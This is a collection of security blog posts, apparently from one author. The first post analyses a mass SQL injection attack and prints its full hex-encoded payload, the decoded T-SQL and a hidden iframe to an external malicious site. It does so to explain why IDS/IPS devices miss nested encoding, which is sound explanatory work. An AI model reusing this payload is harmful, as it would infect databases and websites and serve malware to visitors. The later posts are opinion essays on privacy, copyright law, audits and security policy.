Michael N. Dundas

A friend and co-worker of mine Jerry Mangiarelli recently posted about a SQL injection attack that he has been following.  You can read his post here.  As he indicates, it is not a new attack, nor a very complex attack.  If you are interested in more details of the attack, SANS has more detailed review of the attack available here. My focus is not so much on the attack itself, but on the detection of the attack with security devices and why it is harder problem than many realize.

I think this attack is a really good example of how it is difficult for firewall, IPS, and IDS vendors to detect these type of attacks.  While the ability to do so is improving every day, and vendors will claim they can (and in some cases they can), the bad guys do have the advantage.  For the purposes of this post, I want to focus on how the attack attempts to hide from deployed security systems.  This attack can be used as a great example of how easy it is to evade detection systems for people that are not technically dealing with attacks day to day and wonder why it is so hard.

The key to this attack is the CAST function.  This function (which is available in many programming languages), will convert one data type to another.  A set of integers to a letter, a decimal number to a hexadecimal number are two examples.   In the attack, hexadecimal is used to mask the alphanumeric requests to the database.

If you look at the actual CAST function request, you see a 0x (means the next characters are a hexadecimal base) followed by:

6445634c417245204054207661526368615228323535292c406320764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e616d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e696420614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e78545950653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d205461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722834303030292c5b272b40432b275d29292b6361535428307833433639363637323631364436353230373337323633334432323638373437343730334132463246364536353644364636383735363936433634363936393645324537323735324637343634373332463637364632453730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323634363937333730364336313739334136453646364536353232334533433246363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c655f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c655f435552736f7220

The CAST function will convert the hexadecimal above to alphanumeric. The result of that conversion is:

dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe=’U’ and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc(‘UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))’) FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor

Now you can see how this looks more like a SQL statement, it is just masked.  Where it becomes difficult for IPS/IDS vendors is that the translation that I did above, doesn’t happen until it reaches the sql engine for the targeted database.  So in flight through network it appears as hexadecimal.  Do you design your IPS/IDS systems with a sql engine that performs this function on every command?  That takes time and resources. And what would you trigger on exactly in the decoded section above?  The most logical thing to detect on in the decoded section, the attackers have actually hidden.

If you look carefully, there is a second CAST function nested within the first CAST function.

caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E

If you convert the hexadecimal in this inner CAST function you get:

<iframe src=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″ height=”0″ style=”display:none”></iframe>

This would be the logical area to detect.  A SQL query containing an HTML IFRAME tag to an external unknown website.  And this is the attack.  The problem is that the IPS/IDS, firewall or other security would have to do the extra function of converting the CAST within the CAST function.

Processing recursively  is resource intensive.  How many times to you recurse through the CAST function?  Are there other functions in SQL you should check?  What about if it is not hexadecimal but octal or some other numerical base?

While security vendors often claim they can detect the above, there are often many conditions around those claims that they do not explain.  Encryption, nested functions as above are but a few examples.  These problems go beyond just SQL injection as well, and apply for many types of attacks.

When evaluating these technologies, it is important that you have someone on your side that is independent of any vendors.  An employee or consultant that understands your requirements, is technically sound and solid about how the technology works (not just in theory), and can work on your behalf to ensure you understand exactly what the technologies can and can not do.  You then have a real understanding of the risks and exposures you face.

photo credit

I have been following the RIM security saga with India and Saudi Arabia.  I have previously mentioned, I have been in the U.A.E. in the past performing security consulting.  A few facts I know:

All HTTP goes through a proxy. If you connect to a service provider, all your flows go through an HTTP proxy system.  The proxy system scans requests and compares them to a database of categorized sites.   The government provides policies to the service providers, and it is required by law they are enforced.  They are enforced in real time.  Attempting to visit an unauthorized site you will be re-directed to a page in Arabic explaining that it is not permitted.  I actually kept a screen capture of the page and was going to post it, but I can’t find it.  However, if you are in Dubai, just try to go to a site that has questionable material.  You will be re-directed.  Anyone can do it, it is not a secret.

HTTPS was ready to be implemented. Approximately 2 years ago, they were testing the ability to decrypt SSL on the fly so that they could perform analysis on the requests and grant or deny access as with HTTP traffic.  I am sure this is deployed by now.

Voice Over IP, Instant messaging and other protocols had specific policies. I won’t go into the details here, as I don’t know how public this information is, but there were active policies deployed around these and other protocols.

Privacy is not the same as North America. In North America, we many feel that privacy is slowly being eroded.  In comparison to Dubai our policies with respect to privacy are impressive.  The ISP has the right to watch what you are doing and actively grant, block, and log your activities.  It is actually a requirement in order to get a license to be an ISP from the Government.

When Saudi Arabia indicated they were going to ban Research In Motion devices due to the fact the government was unable to decrypt communications as needed, I was hopeful that RIM would say too bad.  Of course that was the idealist in me hoping that RIM, a Canadian company with one of their key features they market is  about Blackberry and its security would not be compromised.  The realist in me understands that the Middle East is a growing market and from a business perspective RIM has no choice but to be a part of it.  If you want to do business in Canada you have to play by our rules, so it only makes sense that if you want to do business in the U.A.E., you have to play by their rules.  As expected, RIM reached a deal with Saudi Arabia.  They also reached a deal with India earlier this week.

What I find amusing is the latest Spin they have put on security given the situation.

RIM made no direct comment on any discussions with the UAE or others, but it sought to reassure customers about the security of their data on BlackBerry networks.  “While RIM does not disclose confidential regulatory discussions that take place with any government, RIM assures its customers that it is committed to continue delivering highly secure and innovative products that satisfy the needs of both customers and governments,” the company said in a statement to customers.

A RIM spokeswoman could not be reached for comment.

RIM said in its statement that under its security system customers have their own encryption key and “only the customer ever possesses a copy” of that key.

While I am sure they have not lied, you can’t have it both ways.  Either you comply with the government request that they can decrypt messages and data as they require, or you don’t.  Any other suggestion implies that the laws within the UAE have changed.  I am not a lawyer, but I haven’t seen any news about new laws protecting UAE citizens privacy.  The best part is the last statement how the customers have their own encryption key that only they possess.  I am sure that statement is true.   But it is what is not said that is telling.  Are there any more encryption keys other than the one the customer possesses with respect to the customer’s messages?   Companies that deploy encryption and decryption of email, files, and data in general give each employee a copy of their own key that only they possess.  When encrypting data, the system creates some sort of a unique key (lets call it E) that is actually used to encrypt or decrypt the data.  The E key is then encrypted with the customers encryption key (lets call that key Ec).  The trick with businesses, is that the E key’ is also encrypted with their own key (lets call it Eb).  If you loose your key (Ec) or refuse to give it when asked, they can use their key Eb to decrypt and obtain E key.  Once they have the E key, they can then decrypt the message.  There are several variations to this but the basic premise from a recovery perspective are the same.

This is not the first time this has happened either.  Not sure how many people remember Hushmail.  I wrote about them here.  Hushmail marketing was based on the fact that if you used them for email, no one but you could retrieve your email stored on their servers.  Even Hushmail staff was not able to retrieve the email if they wanted to as they did not have the keys.  (Sound familiar to the RIM article above?).  Yet, when U.S. law enforcement contacted them about an individual they were investigating, Hushmail was able to provide them with 12 CDs filled with unencrypted emails of the individual under investigation.

While I don’t blame RIM for their bowing to the governments of India and Saudi Arabia if they wish to do business in their countries, I dislike the spin they are placing on security.   They are mis-leading the public and playing on the fact that many people do not understand the intricacies of security.  While they are not lying, I strongly suspect they are not being forthright.

When all the dust settles, it is important that people realize that money is what drives business.  You can claim all morals, goals, and visions you want.  But if at some these come into conflict that causes enough money to be at stake compromises will be made.  Security unfortunately is no different.

I am not a lawyer, nor am I a politician or a copyright expert.   I have been following the copyright debate quite religiously for the last 3-4 years, trying to learn what I can.  In Canada Bill C-32 has been tabled to update the copyright laws.  There has been lots of discussion about the Bill, specifically around the digital lock rules in this bill.   Big industry wants to protect their materials, by making it illegal to remove digital locks, for any reason whatsoever, without permission of the copyright owner.  It also seems that it is illegal to publish tools that would assist others to break digital locks.  Both of these issues concern me.

See, I do research into security technologies as part of my job.  Security is also a personal interest of mine.  As an example, I am currently looking into a particular application that uses SSL to encrypt the data between points.  In order to do what I need to do for the research, I downloaded an open source tool, that basically breaks the SSL.  This allows me to work on my research with the application in question. If that tool was not published due to Bill C-32, then that stops me from doing my research.  I suppose I could create my own version of the tool, but why would I do that if someone already has a tool readily available?  It makes no sense.   The most likely response to my specific example is that SSL isn’t proprietary so it does not matter.  That is true in this case, but what about when I am evaluating a Blackberry PDA or an IPhone?   I suspect RIM and Apple might not take to kindly to me exposing problems in their software.  See, the current Bill C-32 might allow them to do this.   That is bad for security, bad for keeping companies honest.

I think it makes more sense to punish those that use the tools in a wrong way.  If someone was to take the tool, and use it in a botnet to extract credit card information, then the individuals that did this are guilty and should be charged.  The person that made the tool is not the guilty party.  It is like making Smith & Wesson responsible because they created the firearm that was used in a murder.

Overall, I think Bill C-32 has made much progress from the previous bills in Canada.  My hope is that the Government starts to do their job and properly debate the bill and get input from all interested parties, not label people that question them as extremists.

I have been reading up on a few of the auditing standards such as COBIT and PCI.   I have dealt with audits at clients in the past.  Financial institutions take them very seriously.  Given the nature of their business and the recent financial crisis last year this approach makes complete sense.

There is a need to ensure audit compliance across the entire banking infrastructure.   From a financial perspective, compliance with the various audits is a must if you wish to stay in business.  Of course, my background is in network security.  Network security is not the same as auditing.   Although I have not met anyone that would say if you pass a particular set of audits you are secure, I have noticed across the audit industry in general there seems to be a unstated understanding that if you do pass audits you are secure or more secure than if you don’t.

Passing an audit does not mean you are secure.  Here is one of a few, but simple examples I have come across.  One of the audits requires that your entire internal network has address translation from inside to outside.  Effectively, the idea is that if I as a outside user browse to http://michaeldundas.com, that address would appear to the requester as 216.240.0.43.

From the quick diagram above, you can see how the client thinks that it is directly connected to 216.240.0.43/32, and it is.  Based on the audit requirement of having complete address translation with the untrusted Internet, you would have to configure a device that would convert the IP address the client has, to a different IP address.

The second diagram shows a router configured with Network Address Translation (NAT) to convert the IP address in both directions.  In this way the client does not know the real IP address of the server.   Any attack that you could do without NAT, you can do even if NAT is there.  Anyone that is active in attacking servers knows this.  It offers no additional security, just extra work.

Auditing does have its place and is necessary.  Complying with audit requirements for many industries is not an option and your staff must understand that.  But don’t let yourself or your staff be fooled into thinking audits make you more secure.  Audits help but they are not a substitute for good and proper security.   Passing an audit does not mean you are secure.

This is probably the biggest ‘no no’ in security theory.  Don’t let an untrusted device onto your network.   Most security professionals know that is an ideal, but not really achievable.  Companies are forced to let  customers connect via the Internet with any system they choose to.  Browsers such as Firefox, Safari, Opera, Internet Explorer; Windows, Mac, Solaris, Linux for an operating system.  In most cases for the end user shopping it is all acceptable.

In an attempt to mitigate this problem, we use firewalls, Intrusion detection/protection systems (IDS/IPS), and other devices along with design principles to create Zones.  These Zones then have policy applied around them indicating levels of trust to be permitted into a particular zone.  All this is very similar to physical security principles, just stop and think about an airport.

Most large companies apply these theories described above on their internal network as well where they have enjoyed much more control.  Often an organization has a laptop they give you.  It has their chosen Operating System, their selected applications, and is locked down by a policy they have chosen and enforce via Active Directory or some other mechanisms.  Combine this with internal security devices, apply “Zoning” and appropriate policy and you feel safe — you have control of your internal network right?

But there are always the exceptions.  These exceptions represent the outside pressure to change your security stance.  A consultant or vendor is a good example.  In comes a consultant to do a 8 month project.  She needs access to certain aspects of the systems.  Access to employees calendars, access to critical systems for the project, external access to the VPN of her own company, external resources on the Internet that are ‘bocked’ by your particular policy.  She doesn’t use Windows, but her own flavor of Linux she created herself.   Taking a security stance you can say no, but that only works for a while.  Eventually a project comes along that is too critical, costs the company a lot of money to complete, and completion means bigger sales.  Now you and the security principles you enforce are perceived as a roadblock to accomplishing a key objective.  Inevitability, you are forced to make an exception.  It is at this point all your hard work is nullified.  Not only that, you loose the respect of others in the organization.  You are seen as a inhibitor, a constant roadblock, a team that no other teams wants to deal with.

This problem which has been around for years is accelerating and getting worse.  With PDAs, netbooks, iPads, iPhones, and every other network enabled device that is becoming common for everyone to have.  They are going to want to connect them to your corporate network.  You can resist for a while, but resistance is futile.  Like the common consultant example above, you will make exceptions and eventually the number of exceptions will be greater than the non-exceptions.  Bruce Schneier recently commented on this when he was interviewed at RSA.

More and more companies now have to get used to the fact that people are going to come in with the technologies they want and that is what they are going to use.  So we are going to see a lot more security around connecting random untrusted devices into a trusted network.

When you get to the younger generation, they are not going to work and get a computer that is less powerful than the one they use at home.  They are not going to be given a second cell phone.

“I’ve already got a cell phone, I’ve already got a PDA! … I’m not going to use two.”

We need to shift how we design security.  Rather then resist these new devices, we need to design our security on our internal networks and systems so that we can manage the security around these untrusted devices connecting to our networks while allowing these devices to function.  Resisting this will end up just like trying to resist the consultant or vendor, being forced to make an exception, being perceived as the team that is difficult to work with, and loosing the respect of your colleagues.  With the number of Android phones, iPhones, iPads, and other portable network devices coming onto the market, the exceptions to most security policies are about to sky rocket.

Is your organization working pro-actively to address, incorporate and manage untrusted devices in your internal network?

photo credit

After school, my first employment opportunity came in the financial services industry.  I worked for a bank and was initially responsible for a group of firewalls that separated the Internet from the internal bank network.  It was a little more complicated than I am describing as there were technically several networks with different ‘trust levels’ and the firewalls deployed policy in an attempt to enforce these levels of trust.  Aside from my role of ensuring the policy accurately reflected the business requirements, I spent time ‘looking’ for anomalies, potential attacks or issues.  This work involved writing lots of Perl scripts to parse and correlate logs, analyzing packet captures, running vulnerability and penetration tests and the other typical functions a security analyst performs.   While it sounds very proactive, the amount of actual proactive work was in reality minimal.   You get bogged down with other projects, meetings, lack of resources, a deadline here or a emergency there.  I eventually switched to a different team that designed the networks and security.  My new manager who till this day I have the utmost respect for and who is now retired wanted to have myself and another individual be given permission to spend a week or so of dedicated time to snoop around the network, servers, and systems.  We would attempt to gather what information we could obtain authorized or not. We would be given free rein to see what we could gather.  The only restrictions were no DoS attacks or causing outages and we were to remain stealth.  We would put all this information in a confidential report for management.  He presented this, but was told no.  I was very disappointed.  The project sounded very exciting and fun and I was so looking forward to it.  My manager was disappointed as well, although he said he expected that response and shared with me why that decision was made.  He is a very smart man and was ahead of his time.

Over the Easter weekend, I had the opportunity to speak to a friend who has worked for the federal government for over 30 years.  My friend was telling me about a security team who’s  sole responsibility is to be proactive.  This team searches the network looking for vulnerabilities or attacks that are in progress, usually under the radar using a variety of open source and other tools.  My friend was very positive about them, indicating the team has done really good work and produced excellent results.  I was happy to hear that a large organization such as the federal government had a full time team dedicated to this purpose.

In my years consulting for many different industries both large and small, I have seen a very obvious increase in proactive security monitoring, analysis, and investigation.  Most financial industries have teams in place today as well as other large organizations.  Unfortunately, in some cases, these teams are not dedicated full time, rather it is one part of their many responsibilities.  In my opinion, this is where a mistake is being made and the effectiveness of having proactive security teams starts to be a problem.

One of the biggest reasons that proactive security analysis teams are not present, or only part-time is cost and lack of measurable valid metrics.  How do you measure the effectiveness?  It is possible the team might go for weeks, not finding any big vulnerabilities.  Maybe there are not currently any attacks present on the network.  Maybe there are active attacks, but they are currently not looking in the right places?  Maybe they don’t have the expertise required to see the attack in progress?   From a financial perspective, one sees large sums of money for the team of experts and you may or may not get tangible results.  It is a tough justification.  If money gets tight within the organization, this problem often worsens.  Research often falls into very similar circumstances.  There is an intrinsic value to having these types of teams, but how does one represent that financially?  I haven’t figured out an answer to this yet.

For industries that provide infrastructure or financial services, or deal with data that is sensitive, I believe that regulation from government is necessary for this type of activity to be provided with guarantees.  I think as a society we will eventually get there, but it will be a long battle with industries pushing back indicating that they can self-regulate.  Given the types of attacks that are now prevalent, proactive analysis with expert people is absolutely necessary.

If you ask any organization large or small they will all state they take information security very seriously.  But would you expect a different answer?  I have spent the last 8 years consulting, and this has given me an insight into those statements.  In my experience, the reality of those statements contain quite a bit of variance.  From my Consulting engagements in many different parts of the world, I find that this is somewhat geographically based.  If you head over to the middle east for example, I have found that proactive security is present in many organizations and it is not new.  The attitude is different as well.  Proactive security is expected, from senior management down and if you mention the idea of not having it, the reaction is to look at you as if you are nuts and in most cases that reaction is a truthful one,

How serious is your organization about security?  Do there actions match their statements or are they just words?

We own a 2007 Equinox built by General Motors.  Besides being a little heavy on gas usage by today’s standards, it is a good vehicle.  It is comfortable, handles well in winter, has plenty of room.  I have never been a fan of North American vehicles.  I personally tend to favour Acura, Audi, and Mazda, but the Equinox at least got me feeling better about GM vehicles.  Then I had to change the headlight.

The passenger headlight was no longer working.  When I went in to get the oil changed, one of the technicians informed me that it was out.  I asked if they changed light bulbs.  He said they do, but not on this vehicle as they did not stock the bulb.  What he said made sense and I knew he wasn’t lying, but something about the way he said it bothered me.  A couple days later, my Mazda was at Canadian Tire getting the brakes done and the summer tires put on.  I asked the mechanic if they could replace a light bulb on a 2007 Equinox.  He said they could but it would be at least an hour in labor charges.   How hard could this be I thought to myself?  So I purchased the light bulb for $10.00 and thought I could put it in myself.  The manual had a single page with 3 diagrams and 4 steps each a single sentence.  With instruction manual, light bulb and required tools I was Clear to go …. or so I thought.

In order to get at the light bulb to change it, I had to remove 11 screws, one of which is way down through a tiny hole that you can barely get your arm in, let alone the ratchet tool needed to undo it. The first 8 screws loosen the front grill, so you can bend it back, so you can get at the light.  You have to loosen and pull the light unit out to replace the bulbs.  The actual bulb replacement was easy, took 2 minutes.  Then you get to put everything back together.  Needless to say I was happy I accomplished it, but frustrated it was so much work.  I now understand why mechanics charge an hour of labour to replace a headlight.

I think something went wrong during the design of the Equinox, they lost the perspective of the end user.  I expect to have to do certain tasks to maintain my vehicle in good working condition.  The end user will have to put gas in it, check the oil level, check the washer level, check the tire pressure, change light bulbs. When designing a vehicle these things should be easy to do.  Removal of an entire front grill, reaching to find screws in small confined places to remove a headlight assembly are just silly.  Where was the person that during the design process said “Wait a moment.  The end user will not be able to replace a burnt out light easily. We need to re-think this.”?

This whole situation reminds me of the security industry I am a part of.  So many of us are paranoid, constantly trying to ‘lock’ things down, create multiple steps that a user has to go through to get access or maintain access to networks and data, often to the point of inconvenience and annoyance.  One of my first managers, now retired constantly complained about this type of behaviour.  He was a very smart person and I learned a lot from him technically.  I also learned a lot from him about large financial institutions and people.  One example was the password requirements.  It was required that every 3 or 4 weeks, you had to change your password.  The password had to have so many characters, including a numerical as well as a ‘symbol’ character or two.  He kept changing between two passwords.  Then someone in security got the brilliant idea that in order to increase security, they would remember the last 30 passwords so that users would be forced to create new ones.  That would increase security right?  He was so annoyed that he changed his two passwords to a single password with the month and year on the end.  Every time he needed a new password he would simply change the month and year.  Problem solved.  It was unique and predictable.

If we are designing vehicles, applications, network security, or procedures it is important to include in the design the answers to typical human behaviour.  How will end users will respond and react to design decisions?  Is this response what we wish?  What ways could it be mis-used?  If you are not satisfied with the answers, you should re-consider the design.  In the case of security, it is important to accurately assess what you are protecting and design security accordingly.  By attempting to enforce more security than is necessary, you may actually increase and not decrease the risk of what you are trying to protect.

One thing for sure, the next time I purchase vehicle, I will be checking how much work it is to change a headlight.

Have you ever seen the Verified by Twitter logo.  It is suppose to give the public assurance that the person that holds the account is the real person and not someone pretending to be them.  Off and on over the last few weeks I have been trying to find out what the procedure is? What are the requirements?  How to they prove the individual is who they say they are?  Does Twitter intend to role it out to everyone?  I have had no luck.  Any queries seem to go into a vacuum.  They have this page which says:

To prevent identity confusion, Twitter is experimenting (beta testing) with a ‘Verified Account’ feature. We’re working to establish authenticity with people who deal with impersonation or identity confusion on a regular basis. Accounts with a Verified are the real thing!

The first and last statements are what interests me, “To prevent identify confusion” and “Accounts with a Verified are the real thing!”.

I have always been a fan of the music group The Corrs.  One of the members, Sharon Corr has gone out on her own and is creating some songs and getting ready to release an album.  I have been following her on Twitter. She has a Verified by Twitter account. Her twitter ID is @Sharon_Corr.  If I look at her account, from the picture and links to her website and videos I can be reasonable certain it is her.  However, what if you were looking for a different Sharon Corr.  There must be more than one Sharon Corr in the world.  So I randomly tried @SharonCorr.  This person appears to be someone who writes poetry.  But is her name really Sharon Corr?  What if it is and she applies for a Twitter verified account?  Will Twitter verify it and give her the Verified by Twitter logo?  If her name is Sharon Corr, then they should.  But that might confuse someone like myself, looking for the singer Sharon Corr, so maybe they won’t.

How does Verified by Twitter make me feel safe as a user of Twitter?  If they fully roll this program out, they will encounter multiple people with the same name that all have verified accounts.  Maybe they use the URL on the profile page as the key.  If I see that the URL points to Sharon Corr’s website and there is a Verified by Twitter logo I can be certain that the person that has the website URL, also owns the Twitter account.  Of course that would confirm the relationship between the twitter account and the website, not the actual person Sharon Corr.  This of course assumes they know what I am looking for?  How do they know which Sharon Corr I want?

I looked up Taylor Swift for fun.  Her account is Verified by Twitter.  Her ID is @taylorswift13.    There is also a @taylorswift13x.  If you look at the two accounts they are very similar.

Taylor Swift’s real account (I think)

The website doesn’t help, because the URL points to itself.  We know Taylor Swift is popular so if you look at the followers count and combine that with the tweets and news articles you can conclude this is her account … maybe.

A fake Taylor Swift account (I think)

This is probably the fake one because of the follower count.  But then again, maybe this persons name is Taylor Swift and maybe this is the person I am looking for, not the popular one.  I am very confused now and Twitter said in their statement above that they were going “To prevent identify confusion”.  In order to do that, you actually have to know what identity I want to find, you can’t just guess. But that is what they are doing ‘guessing’ what I want based on popularity.  I think Verified by Twitter is just security theater.  The verified account doesn’t help.  Verifying someone is a complex problem and  putting a logo on a page just doesn’t cut it.

Maybe the logo should really be “Twitter verifies this to be the popular person you might be looking for logo”?

There are some interesting events and decisions happening in the restaurant, finance, and healthcare industries.  These and similar events of course affect any companies in other countries such as Canada with international customers in these industries.  A part of me hates to say this, but these data breaches are a good thing.  Breaches force laws which in turn force companies to spend appropriate time and monies on security research, secure software development, secure network architecture, secure deployment and proactive monitoring that should be done.  It puts financial and legal obligations on private companies, which causes the risk factors to change when assessing security.  Far to often, security is one of the first things to be ‘adapted’ when costs get higher than expected or time lines become critical.  If you ask any company they will say security is a primary consideration at all points in the development and release process and in some cases they are being truthful.  However, in many cases the minimum bar with security needs to be raised significantly.  Simply running your code through some basic buffer overflow checks, installing a IPS or firewall, and checking off your ITIL checklist is not enough, not even close.

The private sector has a long way to go with security in software development, network infrastructure, and international laws.  Security breaches force laws and public scrutiny, which in turn holds corporations and individuals accountable.  They are a catalyst which unfortunately I believe is necessary for appropriate change to occur in this area.  What I sincerely hope is that these and similar events cause large corporations and software vendors become much more proactive when it comes to security than is currently the case.  If done properly and pro-actively, less government regulation will be required.   I believe the choice as to how this plays out is with the private sector.  If private sector companies continue doing the minimum, than I suspect regulation will eventually be forced upon us.  I hope that too much regulation is not required.

Does your company lessen security requirements due to costs or project time-lines?

photo credit

http://www.flickr.com/photos/imuttoo/3935553419/

On the Securosis blog there has been two posts recently (here and here) about security and taking a default deny position as the best approach to securing a particular service or network.  At a high-level, you block every port / service / protocol that is not defined as being required and then wait to see who complains.  As people complain, you investigate the complaints and figure out what policy changes are required and make them.  The end result is a secure policy allowing only the required access.  At least that is the theory.

I believe that “default deny” is a excellent security goal.  That being said, obtaining that goal has to be weighed against other objectives.  Often, I find many security professionals proclaiming that ‘default deny’ must be deployed, everyone has to make it happen, regardless of the cost to the company, regardless of the risk to the project.  The general sense is that if default deny can not be completely reached, the project should not go forward or should be held up.

This sets a very adversarial tone for everyone involved in the project.  It creates a very binary choice, “you are either with us or against us”, there is no in between.  While this is great in the movies, for the most part, it is not real life.  That positioning breaks down communication, it puts the team on the defensive, and it creates a environment where the team does not want to talk, work, or involve the security experts.   They are seen as unreasonable and unrealistic.  Have you ever been ordered by law enforcement to “stand back”, “show me your driver’s license”, or told you can not cross this line with no explanation as to why?  How does it make you feel?  Did this attitude earn your respect or lessen your respect for them?

The default deny stance is easy, minimal work, and most importantly risk free for the security members of the team.  While that is not a bad thing, it often increases the amount of work for others on the team as well as their responsibility.  In a simple case, if on a project by blocking port 1234/tcp, I force the team to have to re-program the socket interface on the application, which in turn generates a code review, which then generate more work for the Q/A team.  If the team overrides the security experts and says we are not doing that work, the security members can now claim they did their part, the team did not listen and so if there is a breech it is not their fault.  This does not promote a collaborative team environment.

Humans naturally fear the unknown.  It explains why as a society we overreact to terrorists that attempt to blow up planes or all rush to get the latest vaccine for a new strain of bacteria.  In both cases we are more at risk of death from being hit by a car in our daily travels yet we show no fear that will occur.  This irrational fear is re-enforced in courses and books on security.  The result is we see “default deny” as a valid and only solution.   The result is security professionals promoting often with a very hard line just that.

“Default deny” ideally assumes that their is an understanding of a service or application in its entirety.  From the end user interface right down to the bits that traverse the wire  in detail under all conditions.  Years ago this was possible, however todays applications are rarely the result of one teams code from the ground up.  APIs of third party vendor systems are called, third party libraries are used for communication, storage, authentication and many other functions and features.   Today, it is unreasonable to assume that a particular team will understand everything at all levels given the nature of how services on the Internet are built and deployed.  Security professionals are correct in pointing out this is a risk, however it is a risk that is not going to go away and security models have to adapt to manage and minimize the risk.  A simplistic “Default deny” does not accomplish this.

I have consulted for several very large tier 1 service providers.  The default position tends to be a “Default permit”.  From there they determine what is ‘bad’ and craft security policies to deal with and minimize the risk.  While enterprises can afford to take a more “Default deny” approach, this will become more and more difficult.  As services are more and more build by external vendors, use third party APIs and libraries, interact more and more with cloud computing, permit access on PDA devices for services, and the many other services available and yet to be available a different approach is needed.   “Default deny” is a great goal for security of a project, however it needs to be prioritized with and assessed from a risk perspective with other goals of a project.

Do you think that the security community of today needs to change their approach, and behaviour?